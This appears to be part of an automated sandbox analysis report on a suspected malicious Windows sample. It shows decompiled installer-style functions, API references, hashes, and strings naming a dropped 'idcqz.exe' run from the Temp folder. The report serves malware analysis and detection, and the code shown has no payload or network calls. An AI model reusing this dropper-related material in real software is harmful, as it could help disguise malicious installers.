0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004066AB Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x7a8ad8 + _t44 * 2;
				_t45 = 0x7a6a40;
				_t108 = 0x7a6a40;
				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040666E(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x7a6a40;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x7a9000;
								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
							} else {
								E004065B5(_t108,  *0x7a8aa8);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068F5(_t108);
							}
							goto L38;
						}
						if( *0x7a8b24 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x7a8aa4;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066AB(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x004066ab
0x004066ab
0x004066ab
0x004066b1
0x004066b6
0x004066c7
0x004066c7
0x004066cf
0x004066d0
0x004066d1
0x004066d2
0x004066d5
0x004066dd
0x004066df
0x004066f0
0x004066f3
0x004066f3
0x004066f7
0x004066fd
0x00406700
0x004068db
0x004068db
0x004068e6
0x004068f2
0x004068f2
0x00000000
0x00406706
0x0040670b
0x00406720
0x00406721
0x00406727
0x004068b9
0x004068c7
0x004068ca
0x004068ca
0x004068bb
0x004068be
0x004068c1
0x004068c3
0x004068c3
0x004068cc
0x004068cc
0x004068d2
0x004068d5
0x00406708
0x00000000
0x00406708
0x00000000
0x004068d5
0x0040672d
0x00406730
0x0040673f
0x00406746
0x00406752
0x00406755
0x00406758
0x00406759
0x0040675e
0x00406764
0x00406767
0x0040676a
0x0040685d
0x00406862
0x00406895
0x0040689a
0x0040689f
0x004068a4
0x004068a4
0x004068a9
0x004068af
0x004068b2
0x00000000
0x004068b2
0x00406864
0x00406867
0x0040686a
0x0040687f
0x00406886
0x0040686c
0x00406873
0x00406873
0x0040688e
0x00406891
0x00406855
0x00406856
0x00406856
0x00000000
0x00406891
0x00406777
0x0040677b
0x0040677b
0x0040677c
0x0040677e
0x004067bb
0x004067be
0x004067ce
0x004067d1
0x004067d9
0x004067df
0x004067df
0x0040683a
0x0040683a
0x0040683c
0x00000000
0x00000000
0x004067e3
0x004067e8
0x004067e9
0x004067eb
0x00406802
0x00406810
0x00406816
0x00406818
0x00406836
0x00406836
0x00406836
0x00000000
0x00406836
0x0040681e
0x00406827
0x0040682a
0x00406830
0x00406834
0x00000000
0x00000000
0x00000000
0x00406834
0x004067fc
0x004067fe
0x00406800
0x00000000
0x00000000
0x00000000
0x00406800
0x00000000
0x0040683a
0x004067c6
0x00000000
0x00406780
0x0040679e
0x004067a7
0x00406844
0x00406848
0x00406850
0x00406850
0x00000000
0x00406848
0x004067b1
0x0040683e
0x00406842
0x00000000
0x00000000
0x00000000
0x00406842
0x0040677e
0x00000000
0x0040670b

APIs

GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000400), ref: 004067C6
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
lstrcatW.KERNEL32 ref: 00406850
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406794
C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab, xrefs: 004066D5, 00406788, 0040678F, 00406793, 004067B0, 004067C5, 004067D8, 004067ED, 0040681A, 0040684F, 00406855, 00406872, 00406885, 004068A3, 004068A9, 004068B2, 004068E8
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040684A

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-868987720
Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00404631 Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404643
0x004046f9
0x00000000
0x004046f9
0x00404654
0x00404658
0x00000000
0x00404672
0x00404672
0x0040467b
0x00000000
0x00000000
0x0040467d
0x00404689
0x0040468c
0x0040468c
0x00404692
0x00404698
0x00404698
0x004046a4
0x004046aa
0x004046b1
0x004046b4
0x004046b7
0x004046b9
0x004046b9
0x004046c1
0x004046c7
0x004046c7
0x004046d1
0x004046d6
0x004046d9
0x004046de
0x004046e1
0x004046e1
0x004046f1
0x004046f1
0x00000000
0x004046f4

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040464E
GetSysColor.USER32 ref: 0040468C
SetTextColor.GDI32(?,00000000), ref: 00404698
SetBkMode.GDI32(?,?), ref: 004046A4
GetSysColor.USER32 ref: 004046B7
SetBkColor.GDI32(?,?), ref: 004046C7
DeleteObject.GDI32(?), ref: 004046E1
CreateBrushIndirect.GDI32(?), ref: 004046EB

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026ec
0x004026ee
0x004026f1
0x004026f3
0x004026f6
0x004026fb
0x004026ff
0x00402702
0x00402705
0x00402c2a
0x00402c2d
0x0040270b
0x0040270b
0x00402712
0x00402714
0x00402714
0x0040271a
0x0040287e
0x0040287e
0x00402881
0x00402886
0x004015b6
0x0040292e
0x0040292e
0x00000000
0x00402720
0x00402721
0x0040272c
0x0040272f
0x0040273b
0x0040273f
0x004027d7
0x004027ef
0x004027ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402745
0x00402745
0x00402748
0x00402749
0x0040274c
0x00402751
0x00402758
0x00402760
0x00000000
0x00402766
0x00402766
0x0040276b
0x00000000
0x00402771
0x00402771
0x00402779
0x0040277c
0x0040277f
0x0040283a
0x00402841
0x00402785
0x0040278b
0x00402797
0x00402801
0x00402801
0x00402799
0x00402799
0x0040279c
0x0040279e
0x0040279e
0x0040279e
0x004027a1
0x004027a6
0x004027a9
0x00000000
0x00000000
0x004027ab
0x004027ae
0x004027bc
0x004027c2
0x004027d0
0x00000000
0x004027d2
0x00000000
0x004027d2
0x00000000
0x004027d0
0x0040279e
0x00402804
0x00402807
0x00000000
0x00402809
0x0040280e
0x0040284f
0x00402871
0x00402878
0x0040285d
0x0040285d
0x00402860
0x00402863
0x00402866
0x00402866
0x00000000
0x00402817
0x00402817
0x0040281a
0x0040281d
0x00402823
0x00402827
0x0040282a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040282a
0x0040280e
0x00402807
0x0040277f
0x0040276b
0x00402760
0x00000000
0x0040282c
0x0040282c
0x0040282f
0x00402838
0x00000000
0x0040272f
0x0040271a
0x00402c33
0x00402c39

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004056D0 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056D0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a84;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8b54;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
					}
					_t27 = lstrlenW(0x7a0f68);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f68;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f68[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f68, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004056d6
0x004056e0
0x004056e5
0x004056eb
0x004056f6
0x004056f9
0x004056fc
0x00405702
0x00405702
0x00405708
0x00405710
0x00405713
0x00405730
0x00405734
0x0040573d
0x0040573d
0x00405747
0x00405750
0x0040575c
0x00405763
0x00405767
0x0040576a
0x0040577d
0x0040578b
0x0040578b
0x0040578f
0x00405791
0x00405794
0x00000000
0x00405794
0x00405715
0x0040571d
0x00405725
0x0040572b
0x00000000
0x0040572b
0x00405725
0x00405713
0x004057a0

APIs

lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
lstrcatW.KERNEL32 ref: 0040572B
SetWindowTextW.USER32 ref: 0040573D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B

Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
